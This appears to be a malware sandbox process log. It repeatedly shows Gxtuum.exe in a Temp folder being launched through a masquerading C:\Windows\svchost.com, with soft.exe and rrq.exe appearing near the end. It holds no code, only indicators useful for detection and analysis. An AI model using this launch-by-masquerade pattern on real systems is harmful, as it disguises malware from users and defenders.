C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
"C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe
C:\Windows\svchost.com
